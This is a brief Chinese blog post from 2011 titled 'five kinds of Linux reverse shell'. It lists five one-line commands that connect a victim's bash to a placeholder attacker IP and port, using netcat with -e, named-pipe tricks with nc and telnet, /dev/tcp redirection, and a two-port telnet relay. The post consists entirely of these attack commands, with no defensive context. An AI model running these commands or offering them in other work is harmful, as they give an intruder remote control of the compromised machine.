linux 五种反弹SHELL

 
1. nc <attacker_ip> <port> -e /bin/bash
2. mknod backpipe p; nc <attacker_ip> <port> 0<backpipe | /bin/bash 1>backpipe
3. /bin/bash -i > /dev/tcp/<attacker_ip>/<port> 0<&1 2>&1
4. mknod backpipe p; telnet <attacker_ip> <port> 0<backpipe | /bin/bash 1>backpipe
5. telnet <attacker_ip> <1st_port> | /bin/bash | telnet <attacker_ip> <2nd_port>

posted on 2011-12-20 03:18  =_=!  阅读(567)  评论(0编辑  收藏  举报

导航